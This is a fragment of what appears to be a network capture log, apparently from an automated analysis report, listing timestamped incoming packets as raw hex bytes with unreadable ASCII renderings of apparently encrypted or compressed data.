35 94 f6 26 26 c1 3d 91 44 69 80 d2 8e 6b 1f ac 7a 28 5c 9c b7 2a a5 c6 5a 31 b8 95 65 ef d7 78 9b e7 7e a4 a1 84 9c d2 99 7f 4b 23 d6 a0 95 5f da c1 6a 37 fa fa f3 7c b7 a7 fd 3b 4b 00 14 a9 b2 Data Ascii: o-8]#Ac=/f/mqGLZ2w0.b8JtU-4 -F,Nx['> IRz!Lfp<2?x<Q3T-{L6\I;Cb-"1J]%\s]Uw@5&&=Dikz(\Z1ex~K#_j7\|;K
2021-10-13 13:47:09 UTC	79	IN	Data Raw: 54 28 2b 90 ad 89 ee 3f 4b a7 79 dc db dd c3 df 0d 22 cd c0 2d b4 99 7d 54 e7 d6 b6 95 96 0b e5 3a 7b 9e 1f 5a 49 1c b9 18 eb 29 22 3c ad 4f 16 e7 81 54 f8 44 bf 72 61 e1 82 13 17 94 87 0f 19 8b 9b b7 49 b4 3d 4f ba 8b 43 d7 d5 99 64 cd c0 bf 5d 54 9d 30 50 8e 3c fb cc c1 40 bb 4a a5 1c d3 a3 9c d5 f7 b5 8a 95 67 78 fa 11 6a b8 c9 b6 99 2d aa 6b e2 6f b1 e5 5c 0d 12 59 84 b2 69 33 25 39 3e c0 ef d6 82 0e 92 90 85 dd 04 4c b6 b6 a8 b3 3e 12 16 7f 9f 4b 3e e2 12 05 c9 da 09 5f cf b9 39 cc 12 bf 35 c6 a2 9f 42 6b c0 bd 25 bc 08 63 0e 33 14 a2 b1 4f 9b d9 4f 87 74 1d 4d 6d c5 97 3c 03 1d 17 d9 7e ae 98 90 0c 27 d8 43 25 cc ee a2 f9 47 a1 4a 99 cb d4 6c fd 13 6a 08 ac 3d 55 8c 2b 67 69 6e 44 3a cf 22 dd eb f8 03 c5 21 55 6a 14 82 0c 43 b4 f6 98 dc 83 e5 e9 d6 Data Ascii: T(+?Ky"-}T:{ZI)"<OTDraI=OCd]T0P<@Jgxj-ko\Yi3%9>L>K>_95Bk%c3OOtMm<~'C%GJlj=U+ginD:"!UjC
2021-10-13 13:47:09 UTC	80	IN	Data Raw: fb 22 ff 3f 98 41 a7 fd 0a 4a 00 0d a9 b2 f0 54 7c 63 56 86 d7 c1 22 d1 c3 ec 6d 13 4c b4 7c fe 63 7d 8a 03 84 ab 14 b1 df 04 e8 53 dc a9 24 30 c0 ae 3e b5 16 b1 06 cc e7 74 ca 5c 8e 45 8e 49 80 c6 b0 e5 54 55 eb 3b 13 98 dc 64 17 07 d7 69 03 8b f1 1a a8 07 f4 a1 a0 49 0b df ea c2 ac e0 a9 12 12 cb 41 4e b1 8a 72 91 7d c5 91 70 af fe 13 39 bb e0 0c 44 77 16 2e b3 0b 17 7c 95 71 52 4d 26 40 04 3f 69 a8 fd c2 0b b5 96 06 14 7b 9e ae 97 05 a8 cb 84 c2 60 0f e1 a8 b8 54 25 0f 26 b2 dd ac e5 88 bb 13 f7 be 95 17 4f ad b2 18 8c 55 66 73 8b e8 5f 99 d9 ee 48 ee 8c 26 d2 f1 32 95 8f 9b 18 76 6b b4 5e b3 e6 28 1f 36 a2 1e ff 0b dc 5e 8f 22 bf 4c ee b7 8b a9 6e d8 38 1b 42 b4 d3 3d c7 5f 24 0e 95 9b f2 f2 5f 90 e2 59 e6 ce 75 fc 07 db e9 88 56 94 b4 b9 c0 91 d0 13 Data Ascii: "?AJT\|cV"mL\|c}S$0>t\EITU;diIANr}p9Dw.\|qRM&@?i{`T%&OUfs_H&2vk^(6^"Ln8B=_$_YuV
2021-10-13 13:47:09 UTC	81	IN	Data Raw: 6a 81 d0 36 12 97 51 93 ed dc ba 13 d9 dd fc 7c 3e cf 96 0d b4 2e d8 ac d1 80 40 99 a0 a4 70 a9 a3 ee 97 05 e7 31 29 ce 44 95 93 2f fc 1a a0 f8 28 ae 37 46 c7 61 58 29 d8 7e f2 05 3e 7f 6f 4f 48 c3 55 d0 63 30 82 8b f9 b5 df 1e 7d 1b b3 ca da f1 22 fb b3 20 b5 e5 d6 28 a0 00 71 20 4e 94 7c 65 8b 28 cc 0b 03 f6 6e 27 c8 96 b5 04 de 0a 9d 47 0b 0f 4c b5 75 27 1a 08 f2 bb f3 42 36 b4 f7 fc a9 6c aa 93 7c 02 7a db fc f9 20 8f 3c 79 7f b8 4a e0 b3 91 d6 12 31 a7 af 55 aa 5e 1a ad 6c 6b 66 e8 96 4a 14 fa 6f a6 7f 94 bc a6 45 d8 cb 78 c9 80 83 17 0d c3 a3 18 65 f8 95 41 1f d7 99 8a 34 2c 6c de 98 3a aa a5 41 29 e4 fe 97 cd ae 6a 8c 5f 7d 0a 09 52 1d d3 5a 21 01 4b b1 f4 bb dd 3f b7 10 56 87 98 33 8f 29 0e 87 9f 27 2f d4 38 d1 09 2c d5 7c 43 e9 af f2 69 76 c2 0e Data Ascii: j6Q\|>.@p1)D/(7FaX)~>oOHUc0}" (q N\|e(n'GLu'B6l\|z <yJ1U^lkfJoExeA4,l:A)j_}RZ!K?V3)'/8,\|Civ
2021-10-13 13:47:09 UTC	82	IN	Data Raw: ae 1e 2c 7a 46 f6 e0 fa f5 45 33 ac 3e 10 6e 8a ac ff bb 71 ee 6f e3 9a 6f 2f d0 5d d3 de ed 41 40 30 67 5e d8 b2 d9 b9 35 d6 b9 4e e2 27 39 c6 bc 71 75 eb 4a 67 fe 2f 5c 30 38 3a 33 94 55 ff 64 24 a4 a9 86 2b 7e da b7 97 f4 c3 bc 09 0f 8c 90 16 75 55 56 2f 28 2e eb 2d df 29 ce cf 6d 70 7b 16 93 b4 cc 26 3f c4 ba e8 32 03 36 a9 6a 50 bd f0 12 78 31 cb 07 7e e2 e6 98 37 ae 57 34 19 1c 7d 9a 57 b0 e1 02 4b f9 a2 62 3f c8 a2 f6 68 4b cf 9d 99 62 64 e9 ce dc 17 ae ef 20 e3 a2 97 22 42 91 8c 0a 9b 2a 3f 77 33 4a 27 f2 65 05 c1 4d 7a ef df cd f7 77 1b 25 1a 3a c0 7f 34 20 88 53 bc 67 b7 7d 0d 89 63 10 cd 9e 61 b0 bd 98 b3 50 71 f3 33 4b de 98 60 20 42 e1 ba ed 41 cf be e0 fa 25 e9 cd f2 8d bb db 85 9e fe 56 5e 1b 00 96 e9 13 49 df a5 6a 1e 5f 1a 64 eb 7b 79 54 Data Ascii: ,zFE3>nqoo/]A@0g^5N'9quJg/\08:3Ud$+~uUV/(.-)mp{&?26jPx1~7W4}WKb?hKbd "B*?w3J'eMzw%:4 Sg}caPq3K` BA%V^Ij_d{yT
2021-10-13 13:47:09 UTC	83	IN	Data Raw: d8 b7 6a c4 6e 6e 98 ff 0b 6e ab 80 c2 de 78 1c 53 bb 4d ae e3 a5 29 de 71 b9 e9 8e 52 8c 41 c6 26 fc 3b 4e 6f b1 c1 31 00 a0 67 d6 01 59 14 f4 b8 d5 11 1f ce 0e 7b df 15 ad 5b eb 70 88 4c b5 99 04 5c 72 74 ac d4 06 80 30 5a da a8 db 52 44 02 38 bf 27 41 95 73 d4 2a 00 2f 5c 16 d7 68 da 79 1b 13 64 53 b5 06 73 e2 7d 59 4b 66 09 f6 07 c8 a8 05 c4 05 52 06 a8 b6 4e 39 3d f4 60 b6 80 be 6e b9 52 c3 56 3b df 67 38 99 8f 13 37 22 09 05 72 50 2a 0e 73 8a 7e 0d 65 b4 97 60 46 8b 43 ea 83 1b 6a 5a 8d 47 64 47 2e dc 98 43 77 91 cc 1d 19 63 59 b9 ea 78 ba 9c 5e ca 08 3b 79 af 06 aa 7b 6a 64 da c7 5f 19 7e dc a5 e4 54 d0 70 b4 eb 9f 3c 58 a5 a5 be 3a 3c 69 8a d2 5b 15 92 90 50 4e d9 a1 b9 20 a2 bc 3c 1a 7e 7f c8 4d 5f 63 a3 ed 76 48 5c 4f 2c 9e 89 5e b1 5e 40 a4 c8 Data Ascii: jnnnxSM)qRA&;No1gY{[pL\rt0ZRD8'As/\hydSs}YKfRN9=`nRV;g87"rPs~e`FCjZGdG.CwcYx^;y{jd_~Tp<X:<i[PN <~M_cvH\O,^^@
2021-10-13 13:47:09 UTC	84	IN	Data Raw: 2c cf 19 d5 1c 86 a4 d4 7b aa 66 f6 d7 77 69 31 e5 7b 4c 3b 77 16 5f 9d 72 8e a9 d5 c9 2a 96 1e dc 48 85 8f 09 e6 d8 34 d4 5a 8b 1d f4 82 6b c3 40 da 7c 3a 28 6f 5c 0d bd f8 0a f9 60 7e 81 ff df 24 7c 9b d1 48 7a 0c 31 5e 97 3b c5 c7 06 9b ed ba f9 5c 1d 05 35 7e 28 21 66 ac cb e5 6c 49 10 5a ab ba c4 8d 69 e1 54 96 f7 19 35 61 ca a9 b1 9a 59 df b0 5f d9 79 82 29 5c bd 6b 82 aa 13 49 32 90 59 ad 75 f5 ff f0 32 90 68 14 e2 d1 56 c2 3a 34 c1 e9 eb 31 b0 d1 67 96 ed e9 fd 44 42 10 d5 6c 74 a3 62 8d 2b f0 93 ed 78 87 f0 d6 b0 4e 64 75 b6 c8 26 9f 02 1d 4f 1b 88 f4 6a fc 6f 78 ca d2 52 06 ae 13 db 45 2c 46 6c 5a 17 5d b3 4f ac c0 ed f5 68 4c e1 05 33 b3 7d c3 79 07 5f b9 1f 06 e2 6a 91 2a 3c 05 df cb 07 b7 ff 04 6f 92 b9 3e 21 01 8d 68 03 c7 86 04 b7 6b 25 a8 Data Ascii: ,{fwi1{L;w_rH4Zk@\|:(o\`~$\|Hz1^;\5~(!flIZiT5aY_y)\kI2Yu2hV:41gDBltb+xNdu&OjoxRE,FlZ]OhL3}y_j<o>!hk%
2021-10-13 13:47:09 UTC	86	IN	Data Raw: 6e b2 f3 8c 9f d3 f9 0e 90 a6 85 b8 e1 46 99 fc 71 f0 51 cd 93 d5 6b 8b 9b 87 5a 39 18 7a 3c 78 44 75 c6 91 cc 7b 7c f7 f2 57 4c 4e 53 b5 de c3 36 aa 3f 9f 8c 65 98 b6 f1 15 41 53 99 40 12 a0 20 ee 99 49 d3 e7 6d dc a9 cd 64 c7 30 69 6a bb 95 60 08 d8 fc f4 91 7e ac 98 1f 4e fc 0f 1d 2a b5 14 91 d9 71 f0 f6 2d 72 f3 18 97 39 26 82 f0 3c a2 29 b2 54 53 53 97 dd ec a0 44 a9 f5 ec 62 7e 39 ff 18 a0 fe e8 7a 41 ec d8 63 96 37 74 c7 e7 8f a1 fa 1b fd 2b 84 b5 59 2a 09 b0 66 66 c3 8e 95 b6 b2 dd 7e 7f 0e 70 cb 62 70 38 5e a8 97 54 5c b1 e0 41 65 e6 ef df 18 3b cf aa 5d 66 70 68 5f c1 87 be 23 9b 86 e0 d0 38 0e 10 51 a2 f7 f1 6d 7a ff cf c3 5f 1f a1 71 bd d8 c3 a9 f5 cb 13 8f 0d ed b5 2c 8f 6a 79 8c ac a2 0d 41 6f d5 c8 0e cf 76 89 9d c8 1f 0e 30 89 3a ae e9 b4 Data Ascii: nFqQkZ9z<xDu{\|WLNS6?eAS@ Imd0ij`~Nq-r9&<)TSSDb~9zAc7t+Yff~pbp8^T\Ae;]fph_#8Qmz_q,jyAov0:
2021-10-13 13:47:09 UTC	87	IN	Data Raw: 35 72 23 83 f8 6d 0f 16 bb 6f b3 3a f4 be 52 3a 4f ad 5b 19 db 3e f0 db f7 11 d9 02 a7 e6 d3 b7 4b de aa 82 cf 90 07 eb 8b a8 b6 fe bf d6 98 a3 02 ab bb 89 fb ef 7e 77 dd ca b3 e7 99 1a 5f 85 d6 fa 66 90 f0 01 b2 78 cb 2a 84 75 63 47 59 f7 22 36 95 59 d6 22 92 a8 82 9f ca df 04 39 d2 ad c1 c3 03 3f d8 22 27 d3 a9 ef b3 9e d6 2a b7 40 71 5c d9 5a 10 8d 24 33 5d 65 dd a5 01 65 82 7c 51 3c cc 07 1b 1e b9 54 23 74 d0 c5 4a 66 09 8a 2b 4b bc 5b 4f 63 cb e5 11 79 42 21 3d a6 2a 63 68 eb 61 e7 d9 a5 cf f0 0d 04 08 47 fe f5 1d ff 09 56 00 9b 0d 1a 92 de e3 18 1a a1 10 74 e8 b1 ab 7a 7e 8e 95 54 04 af 6a 4b f5 6f 2d 27 00 85 b9 88 9d 7f 17 da a1 3c 31 d9 c5 ce 7f 24 23 15 42 ab 93 52 11 60 c0 5f 19 52 dc a5 e4 54 d0 70 10 00 d8 f0 39 56 2b f9 2a a3 0e 46 2e 05 9c Data Ascii: 5r#mo:R:O[>K~w_fxucGY"6Y"9?"'@q\Z$3]ee\|Q<T#tJf+K[OcyB!=chaGVtz~TjKo-'<1$#BR`_RTp9V+F.
2021-10-13 13:47:09 UTC	88	IN	Data Raw: 47 e8 3d 9a d2 c1 1f be 61 1a e0 b9 ed f9 b7 41 1f 3f 62 3d 9a 96 24 42 e8 53 08 ca fc 29 64 63 d8 71 98 4f d7 2c 72 a6 d4 87 ac 4f f6 84 ab 86 5e e3 77 26 bc e1 52 32 b6 28 0a 84 54 ce 2e 26 1a 5d 9e 5f 4f 17 7d 9e bf 31 07 c1 64 fd 7e 13 84 f2 87 27 74 a3 3a 4c 0f 85 38 0e f8 a9 ff f4 e3 a9 74 fd b4 11 48 7c 0c c8 40 97 3b 75 09 81 dc 21 33 ba 55 83 9f e1 e1 fd 9f 64 e4 12 7a da ef ce df 38 7c 2a 56 7c a3 54 be 17 c5 2b 0b 4b 22 a6 99 5c 5e 9f b9 d8 a6 27 64 58 ee e6 54 51 43 9d 1e 95 90 ab 76 25 78 25 fc 95 65 80 36 af 47 e5 b1 72 10 e1 29 82 f6 1c 6b 5f 51 63 f2 47 84 59 43 ee dc 0d 85 55 de f1 93 12 fc fa 22 ae e7 cb c1 3d 9c e0 40 3c d8 2e 1b 34 a4 7f 1f 67 1a 61 4e 13 25 8c d3 07 d5 f7 25 4b 63 13 15 08 bf a6 56 9d b0 99 10 18 e1 05 33 4a 6d 4f 39 Data Ascii: G=aA?b=$BS)dcqO,rO^w&R2(T.&]_O}1d~'t:L8tH\|@;u!3Udz8\|*V\|T+K"\^'dXTQCv%x%e6Gr)k_QcGYCU"=@<.4gaN%%KcV3JmO9
2021-10-13 13:47:09 UTC	89	IN	Data Raw: e2 1c 56 70 ad 61 28 9a dd 58 fa 81 16 de 27 8e f1 89 b7 f7 a5 b5 01 83 92 5d 4f 16 70 0e ce 64 c4 cd d8 7b 02 a3 e3 f0 87 f6 fb 77 66 5c bb cd 57 d1 c0 30 c0 5c 8b 9c d9 2b 04 92 ac be 60 40 7a 9f 9a 42 03 ca 40 c6 86 21 70 3a b3 4a a1 43 3d 51 4c ad a8 71 95 d1 23 a8 4a 4f 3a bd f1 3a 07 17 d5 5a 8c 05 da ee ff 9f 9c f8 27 b2 45 b0 dc 11 e9 40 aa c4 a3 55 61 c5 f8 d4 69 09 e9 e5 5a f6 25 2a b5 23 30 29 92 29 eb 8d 48 60 45 1f 4b c7 2c d1 f3 0e 0b 9b 10 65 15 66 61 19 74 e0 be c8 8e 10 bb 20 60 e8 46 92 0f 20 36 f2 3a 4a 7f 2e 1e d5 9d 89 50 af b6 41 15 5c c2 ef 9c d7 e1 7c 7c 4c e6 57 3d b8 2c af b6 08 19 6b b2 17 3c ac c6 0b cd fa c5 67 6a dd 68 7d 6e d8 96 30 7f 57 32 2b ab 40 48 98 01 69 a5 31 aa c0 f8 65 9b 2e 75 70 f5 45 83 17 71 ab eb bf 2c 6a b2 Data Ascii: Vpa(X']Opd{wf\W0\+`@zB@!p:JC=QLq#JO::Z'E@UaiZ%*#0))H`EK,efat `F 6:J.PA\\|\|LW=,k<gjh}n0W2+@Hi1e.upEq,j
2021-10-13 13:47:09 UTC	91	IN	Data Raw: f3 0a aa 1f 51 fc 91 b4 00 7d 6c bb 13 69 6a d8 76 95 87 ab 28 b8 ac 0e 4f 49 52 75 22 11 32 9a 85 72 9d 83 84 a1 8f 39 95 35 b0 6e 57 88 e9 e8 8d c7 01 e8 38 6b aa d5 5b 01 a9 ff 05 86 28 bf e6 a1 b0 41 a3 27 ca 7a 90 20 30 d7 37 c9 ef 59 ab f0 c7 9a 97 3a 3f 9a 6a 07 7b 3c 5b 90 a0 36 02 5b c8 c1 8b 32 ed b1 61 f0 ee 07 01 12 39 95 d7 eb fa 74 93 a0 18 d9 52 74 85 22 32 b5 6c 7b ec 09 f1 63 a0 be 5d 55 1c 1f 3a cb ec e1 71 5f d4 77 f8 16 49 ed e6 f7 cb 65 1b 0c 8e bb 81 d5 c6 ea 7b 6d db 2b 9b 15 8f cf 4e 4a 67 8a 3a dc 7b 66 b3 87 75 b3 04 b1 e7 90 9b 2d 50 68 f6 27 29 6b a5 5c 0c 0e b4 31 6a d4 dc a1 44 9d 47 31 16 08 f6 35 9e 90 47 fc 27 cb 04 d8 95 f8 d6 8d c3 4e e1 f6 ec c2 8d 6c 55 e6 78 69 ca a5 27 bd 3d 32 8a 90 1a 3b 83 99 18 c0 f7 89 15 0c 75 Data Ascii: Q}lijv(OIRu"2r95nW8k[(A'z 07Y:?j{<[6[2a9tRt"2l{c]U:q_wIe{m+NJg:{fu-Ph')k\1jDG15G'NlUxi'=2;u
2021-10-13 13:47:09 UTC	92	IN	Data Raw: ea 36 7e 52 c6 b7 f7 52 7d 40 1f 57 c0 7f b9 b4 33 82 59 01 3c fa bb eb f0 10 a0 dc d6 78 b3 09 b7 87 27 c2 f2 4f 16 60 17 92 b5 e1 03 7b 76 4e be b0 31 2b d9 3d 36 85 98 80 98 0f e7 3c 5c 1b 00 37 2f 13 49 df a5 72 c6 8e f9 20 71 b2 0b a5 79 a0 59 84 1c ee 5b 76 9e a2 82 87 09 2f 34 d5 5a 8f dc 8b 9d 59 4c 22 92 dc c5 17 02 58 bf cf 26 65 86 f5 e1 f7 ad 97 a1 7b 07 7c d5 54 f5 b9 80 13 27 b4 09 23 ea e7 7c 69 cc d1 84 3b f6 59 6d b5 a9 3f 39 39 85 ae f0 32 e3 82 c4 d8 d1 ea f9 2a 6c ee df 08 bf 19 11 3e 5a 3b fe b7 98 59 1d 41 48 d2 09 52 78 37 b9 30 dc ed 0d 6d 22 d3 07 a9 a7 96 99 13 c7 74 14 77 f6 e2 88 c5 bc f5 3e 64 2a c2 44 f7 95 a2 8c 73 f5 97 e5 11 65 43 60 dd 55 29 b8 64 c9 21 09 8b 9b 92 87 aa f4 6b 5a e5 32 65 33 94 83 71 22 e4 ed 48 85 b9 79 Data Ascii: 6~RR}@W3Y<x'O`{vN1+=6<\7/Ir qyY[v/4ZYL"X&e{\|T'#\|i;Ym?992l>Z;YAHRx70m"tw>dDseC`U)d!kZ2e3q"Hy
2021-10-13 13:47:09 UTC	93	IN	Data Raw: b0 14 79 bd 6a f5 96 8e 76 33 fb 78 72 93 91 81 3b fe 88 e3 37 aa 82 25 cd 97 82 1d e8 f3 7a 28 9a 87 65 ee ba 4c b4 4e 2d 34 cc de 64 7a fe c8 e1 a7 33 d8 52 45 29 df 45 5d 6d 02 43 44 e8 ef c8 78 03 9d f5 3b 9b b4 86 be 95 67 b0 cf 77 df ee 3b 3c 18 8a f4 19 a2 19 bf b4 99 97 41 60 75 5b 9e f1 fa 21 fd 67 42 f7 29 a3 4c 0a e0 a9 fc 9e b5 55 66 a5 5e b1 f1 21 f7 bd 03 f2 c7 2c b1 ef cd b1 5a 2d f2 56 d6 2d 51 99 e6 08 94 f2 9b d5 9c bf bb 3c ab a9 44 3d 3f 01 6c d2 1b 5c 9c c8 42 1f ff 62 20 d5 2d 7f e6 c1 93 67 e5 9d b2 5a fa 1a fa 05 90 5c 3a 04 70 b2 28 fb 2c 28 4e ae 27 2a 8d b7 56 7e cb 8a ea 17 3c 28 da b0 40 e4 82 2a b8 3f 9d 00 e6 b5 78 4e 98 8b 3e 0d 71 73 cb 16 8a 6a 27 1c a4 37 8c 12 6f ed 22 f1 22 c0 b4 d0 de 05 12 04 77 a6 67 d2 57 bb 81 a5 Data Ascii: yjv3xr;7%z(eLN-4dz3RE)E]mCDx;gw;<A`u[!gB)LUf^!,Z-V-Q<D=?l\Bb -gZ\:p(,(N'V~<(@?xN>qsj'7o""wgW
2021-10-13 13:47:09 UTC	95	IN	Data Raw: e2 31 65 9d 93 0d 2c e4 e3 ee 34 be 61 ea 57 7f 91 fc 53 f2 21 07 ae 10 8f d3 af 4a e8 04 44 b5 08 f0 52 cc 0a 07 7f 4d e1 8e 26 e9 7d cc fd c6 15 46 10 2a dd f2 7e af f6 40 e5 8b 09 cc 8b f4 14 57 e8 d6 16 bd 73 7a 87 d5 13 11 b7 6b f6 db f2 09 b0 52 27 4f 52 39 0e 50 74 17 dc 0d 11 21 0a ea 88 39 e6 f7 02 91 55 11 c0 8b b1 0e 09 af 8c 28 40 0d ad 1f 5e 60 ea 1e e5 26 62 94 2b 4d 8d a9 3f 9b 38 1b 96 98 75 c9 93 5a 07 ac 40 b7 a9 c8 56 84 08 97 03 66 f7 1e b4 9e 41 53 91 d8 ca c7 c0 c1 de 9a a7 29 24 04 04 00 cf 61 da a9 3c 07 86 52 ba 79 73 4e 18 54 28 f6 c8 78 17 ee d7 e5 97 d1 8f 07 19 16 5d ee 92 1a 38 a5 39 0c f6 f6 10 a4 b1 ed b1 a1 69 d9 a0 33 9f 7d 5e 7f 0c e0 68 bd b3 f4 fa 11 1f a6 80 ab 07 38 56 1e b1 d5 7d ec 95 95 40 f1 e6 74 70 8c d5 b4 f4 Data Ascii: 1e,4aWS!JDRM&}F*~@WszkR'OR9Pt!9U(@^`&b+M?8uZ@VfAS)$a<RysNT(x]89i3}^h8V}@tp
2021-10-13 13:47:09 UTC	96	IN	Data Raw: 43 f6 37 f4 e0 ca 56 fd e7 4f 60 7c 85 8b b0 b0 f2 91 e2 92 0c 71 a4 41 3a ad cf b3 4a a4 b5 ad 5a 7f ee fb f8 b6 cd d0 f4 d5 57 ee f6 a6 44 34 20 50 8b 05 f9 6d f4 ea 37 55 07 3e c3 3e 2d 0b cd bf 89 8a 92 54 06 8b af 18 19 5b e2 66 80 e7 b9 41 1f ea f6 c5 fc f2 7a c9 8e ca c7 a5 b1 11 41 b9 20 fc cb be a3 9e 30 c5 80 a8 21 1b 73 03 f8 76 a2 59 f8 88 b4 e3 ea 30 64 7d 0a 07 13 cd 75 fb 85 da f8 04 8b 19 a9 2c bf 81 52 89 12 20 38 fe 8a 4e eb a0 f1 7a 77 d9 56 8c 29 c3 87 79 8f 88 b1 69 ce a9 24 40 93 c1 6f 37 1d f1 b8 8e 10 85 2b d7 b4 71 4b 05 3d bf bf 76 fa 4d 00 af 41 af c2 45 ea 54 e8 b7 95 25 38 8e cb 88 01 63 3a 8a 2c 78 ee 19 d1 37 bf 0a ce ce 99 05 ae 65 15 5a 7a df a8 6a 4e 6e 41 a2 ea 11 c0 65 22 9c 8e 09 70 9c 64 11 b0 3f a4 e5 00 45 60 4c c4 Data Ascii: C7VO`\|qA:JZWD4 Pm7U>>-T[fAzA 0!svY0d}u,R 8NzwV)yi$@o7+qK=vMAET%8c:,x7eZzjNnAe"pd?E`L
2021-10-13 13:47:09 UTC	97	IN	Data Raw: d1 dd 4d 43 9b a5 53 da 0c 3b 70 6a 8d 32 04 ef 6a af d6 d4 19 48 d5 c0 bf dd fa 24 8a 70 6f 49 99 4f 56 14 62 82 17 b0 78 52 cd 0b 60 0b 3f c7 ec ec 05 84 00 9e c9 d7 0f c6 bd 7c ad e4 49 65 c8 37 ea 52 84 b8 55 ba 34 6b 5f a5 c4 c1 a8 47 f8 90 6c 19 03 4e 41 35 8e 8c ab ed f5 39 ec 96 f1 a3 49 29 4e f0 ce 00 f9 be 46 e7 87 04 b9 f9 29 24 9f af 89 02 9b 47 9a 1e 06 d0 2d 6f a6 68 28 53 31 8f ae 7f cc ac c3 0b f3 9a e7 37 c5 fd b6 8f 18 ec 73 ba 42 f6 48 13 a1 99 55 07 27 d8 43 03 90 ac f1 11 bf 2e 9c ed f8 74 e7 c4 18 bb d2 af 07 fc e9 72 64 3b a1 15 ac 5b 78 83 3d 99 83 87 54 ee a8 1e 53 25 f8 7f f5 bf 86 58 ff 74 64 f6 fe 37 32 15 35 2f 92 59 2c 3a ed a0 44 5b 6e 90 33 a0 6b 3d 20 2d c6 ef 32 fe 7e 04 c3 80 ef c8 ae 48 cd a0 fa 90 e6 9c 6f 8e 55 a3 44 Data Ascii: MCS;pj2jH$poIOVbxR`?\|Ie7RU4k_GlNA59I)NF)$G-oh(S17sBHU'C.trd;[x=TS%Xtd725/Y,:D[n3k= -2~HoUD
2021-10-13 13:47:09 UTC	98	IN	Data Raw: b2 01 4e 11 28 97 a4 7a bb 4e cc e5 11 9c 1a 70 b3 49 35 75 36 09 ef 5b d0 c5 92 0f d3 ea a4 33 e7 a5 f3 1b bb a5 91 8b b7 fc af c8 d7 cc d7 e4 97 4f 41 16 59 21 e8 6c 48 99 05 eb 90 ce 1a c1 d4 09 7a ac ff 10 cb c5 70 f9 ef 97 3f 40 ca 98 fb cb 8f 1b c3 c1 0b d3 de 18 20 7b f4 ef ff 68 85 d0 a7 3d e8 02 c6 ad 12 04 8b 58 7a 04 b2 35 f0 db a8 f4 51 f6 54 65 c1 29 f7 e2 41 17 1d b7 6d 91 11 57 17 19 e5 0a 92 19 2c ca 64 85 44 54 12 ff bb c4 9e 09 f7 c3 ed 76 c3 7c 7c cd e3 ef d5 dc d5 5f ac 2f 9d c0 b0 d3 b9 fd 0a 11 63 8d 9f ea d5 e0 13 f8 d9 25 02 e3 44 40 27 10 7f a5 91 58 07 31 94 3e ef 0b eb 83 96 43 72 9a 67 66 21 a2 2d 5e 93 bf 5f e8 2d 43 45 c2 de f3 36 4b 41 67 3e 38 cf 61 e7 57 97 62 bd 38 59 8d 1c f9 f3 45 33 c7 e9 7a 15 9c 45 6f e2 88 99 6e 55 Data Ascii: N(zNpI5u6[3OAY!lHzp?@ {h=Xz5QTe)AmW,dDTv\|\|_/c%D@'X1>Crgf!-^_-CE6KAg>8aWb8YE3zEonU
2021-10-13 13:47:09 UTC	99	IN	Data Raw: 6b 04 d8 d1 b8 af b7 61 29 5e df 3c a9 79 30 a1 e7 03 3c 5d 82 0c 85 3a d5 11 db fd 30 df d0 44 aa 2d 67 e4 5c 18 69 95 8d 85 9a bc 9d 7b 78 7b 77 f3 f8 41 83 29 3e 49 7f 0b f7 ba a4 4f 97 cf 68 03 50 f9 ec cf 86 5d a0 64 a8 56 6d 09 d4 af c8 66 1e 24 25 6e d4 98 11 8e 91 3d f2 ea 66 1a a1 40 de 1c 65 b8 6e 88 4e 23 39 6d ac 44 d1 bd cf 4b 2f fb e9 37 b0 9b db 8a e6 99 ca 8b 1e fa da 49 3e 45 bb 43 b6 55 d9 7a e3 1b 9b f9 f6 42 d3 23 65 8f 1c f4 81 ae ef b7 67 92 9b ac ca bc 48 6f b0 3c 2f 10 6b 89 84 6b 27 e1 b5 b5 63 5e 32 0f 34 9d 3f 92 c9 69 4c 13 88 70 18 e0 42 80 7d 91 25 19 cb f9 81 7f c6 fd cd ea 09 25 d1 d9 e5 2c 65 90 20 cd 34 dd 00 5a c7 71 1a 0b f8 02 eb b7 3e 38 e9 a0 b8 e1 fe f2 c3 e2 43 b0 d9 03 75 f4 50 8f 8e 3a ea 2f bb 57 ac 28 65 6a 70 Data Ascii: ka)^<y0<]:0D-g\i{x{wA)>IOhP]dVmf$%n=f@enN#9mDK/7I>ECUzB#egHo</kk'c^24?iLpB}%%,e 4Zq>8CuP:/W(ejp
2021-10-13 13:47:09 UTC	100	IN	Data Raw: a4 80 03 99 72 67 a9 ad 1b 58 25 fa bd 73 21 3c 1a 71 5a 8e 44 01 34 b7 39 73 6a 27 b7 01 d2 46 90 b4 42 90 ce df 6d fb 42 fd 93 ed 99 26 27 c0 32 ba 71 d7 64 24 04 e1 1d cb ba 19 f5 33 8a f5 5d a3 04 bc e3 c7 b7 ef 1e f0 de ee 76 d5 85 35 a5 31 66 1d f2 5f 8f 64 0c 7f ad b1 9b 88 6c e1 68 2f 46 cf a1 e3 f3 76 6f 18 72 c8 43 f8 8f f3 f4 b3 c3 61 65 49 4c ec bb f3 fa b0 0e 10 54 7a 40 54 3a c0 7f bf 76 1b 8d 05 fd 3f 2c 87 87 b2 eb c1 91 87 2a d8 18 9b 02 fc 3d 91 da 18 d9 13 e0 de b9 eb 25 3f 4e 35 a5 b4 25 e9 81 9b 2a 21 d6 f3 34 09 d4 5a 57 e8 ad e2 5d 5d 0c 36 33 c5 02 b7 21 1b 75 d3 dc 0a 1b b2 f0 31 40 db 12 c9 5d 7d 58 87 10 99 c2 31 fa 51 1d d2 06 58 a9 85 3c 59 ce 0d 58 1c 0b 3e 5d d7 77 0c 87 d7 90 df 40 d0 7f 6b 7b a5 fd 7f 67 e4 21 a1 8f fd 15 Data Ascii: rgX%s!<qZD49sj'FBmB&'2qd$3]v51f_dlh/FvorCaeILTz@T:v?,=%?N5%!4ZW]]63!u1@]}X1QX<YX>]w@k{g!
